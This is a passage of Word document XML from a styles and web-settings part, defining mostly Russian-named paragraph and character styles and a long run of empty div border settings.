      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aff5">
    <w:name w:val="Основной текст + Курсив"/>
    <w:aliases w:val="Интервал 0 pt15"/>
    <w:basedOn w:val="13"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00F74364"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:spacing w:val="10"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aff4">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="13"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00F74364"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:line="223" w:lineRule="exact"/>
      <w:ind w:hanging="2140"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aff6">
    <w:name w:val="Основной текст Знак"/>
    <w:basedOn w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00F74364"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aff7">
    <w:name w:val="Подпись к картинке_"/>
    <w:basedOn w:val="a5"/>
    <w:link w:val="aff8"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00F74364"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="aff8">
    <w:name w:val="Подпись к картинке"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="aff7"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00F74364"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:line="240" w:lineRule="atLeast"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="1pt">
    <w:name w:val="Основной текст + Интервал 1 pt"/>
    <w:basedOn w:val="13"/>
    <w:rsid w:val="00F74364"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:spacing w:val="30"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:u w:val="none"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="61">
    <w:name w:val="Основной текст (6)_"/>
    <w:basedOn w:val="a5"/>
    <w:link w:val="62"/>
    <w:uiPriority w:val="99"/>
    <w:locked/>
    <w:rsid w:val="00F74364"/>
    <w:rPr>
      <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:cs="MS Mincho"/>
      <w:spacing w:val="10"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="62">
    <w:name w:val="Основной текст (6)"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="61"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00F74364"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:line="248" w:lineRule="exact"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hAnsiTheme="minorHAnsi" w:cs="MS Mincho"/>
      <w:spacing w:val="10"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aff9">
    <w:name w:val="Подпись к картинке + Курсив"/>
    <w:aliases w:val="Интервал 0 pt11"/>
    <w:basedOn w:val="aff7"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00F74364"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:spacing w:val="10"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:u w:val="none"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="00BD42AD"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mw-headline">
    <w:name w:val="mw-headline"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="00F81EAF"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="14">
    <w:name w:val="Обычный1"/>
    <w:basedOn w:val="a4"/>
    <w:rsid w:val="008E402C"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af4">
    <w:name w:val="Абзац списка Знак"/>
    <w:link w:val="af3"/>
    <w:uiPriority w:val="34"/>
    <w:rsid w:val="00332D4B"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="HTML0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:locked/>
    <w:rsid w:val="005377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0">
    <w:name w:val="Стандартный HTML Знак"/>
    <w:basedOn w:val="a5"/>
    <w:link w:val="HTML"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="0053770A"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Courier">
    <w:name w:val="Код (Courier)"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="Courier0"/>
    <w:qFormat/>
    <w:rsid w:val="00E4666E"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Courier New" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Courier0">
    <w:name w:val="Код (Courier) Знак"/>
    <w:basedOn w:val="a5"/>
    <w:link w:val="Courier"/>
    <w:rsid w:val="00E4666E"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Courier New" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="affa">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:locked/>
    <w:rsid w:val="00DA7943"/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTML1">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:locked/>
    <w:rsid w:val="00D2320D"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="affb">
    <w:name w:val="No Spacing"/>
    <w:basedOn w:val="a4"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="002E1B2A"/>
    <w:pPr>
      <w:spacing w:line="276" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="affc">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:locked/>
    <w:rsid w:val="002E1B2A"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="affd">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="affe"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:locked/>
    <w:rsid w:val="002E1B2A"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="affe">
    <w:name w:val="Текст примечания Знак"/>
    <w:basedOn w:val="a5"/>
    <w:link w:val="affd"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="002E1B2A"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="afff">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="affd"/>
    <w:next w:val="affd"/>
    <w:link w:val="afff0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:locked/>
    <w:rsid w:val="002E1B2A"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="afff0">
    <w:name w:val="Тема примечания Знак"/>
    <w:basedOn w:val="affe"/>
    <w:link w:val="afff"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="002E1B2A"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:rsid w:val="000B0124"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="y2iqfc">
    <w:name w:val="y2iqfc"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="00971F7E"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="afff1">
    <w:name w:val="Повелитель"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00085FB4"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="567"/>
      </w:tabs>
      <w:spacing w:before="240" w:after="120"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
      <w:bCs w:val="0"/>
      <w:caps w:val="0"/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="28"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-keyword">
    <w:name w:val="hljs-keyword"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="00F758D8"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mw-editsection">
    <w:name w:val="mw-editsection"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="00A75E0C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mw-editsection-bracket">
    <w:name w:val="mw-editsection-bracket"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="00A75E0C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mw-editsection-divider">
    <w:name w:val="mw-editsection-divider"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="00A75E0C"/>
  </w:style>
  <w:style w:type="character" w:styleId="afff2">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a5"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:locked/>
    <w:rsid w:val="006C1EE0"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nf">
    <w:name w:val="nf"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="006C1EE0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nb">
    <w:name w:val="nb"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="006C1EE0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="p">
    <w:name w:val="p"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="006C1EE0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mh">
    <w:name w:val="mh"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="006C1EE0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="c1">
    <w:name w:val="c1"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="006C1EE0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="o">
    <w:name w:val="o"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="006C1EE0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-function">
    <w:name w:val="hljs-function"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="00B14963"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-title">
    <w:name w:val="hljs-title"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="00B14963"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-params">
    <w:name w:val="hljs-params"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="00B14963"/>
  </w:style>
  <w:style w:type="character" w:styleId="afff3">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0071777F"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="language">
    <w:name w:val="language"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="0082663B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-class">
    <w:name w:val="hljs-class"/>
    <w:basedOn w:val="a5"/>
    <w:rsid w:val="008266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171611">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="173690384">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="186795041">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="224220413">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="250621749">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="255791071">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="326595262">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="399331942">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="404649059">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="440757971">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="466356350">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="516887686">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="546332295">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="145054056">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="11217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68357">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="605428395">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="608506355">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="642781795">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="677460957">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="702942644">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="710111859">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="803084097">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="939140879">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="981275572">
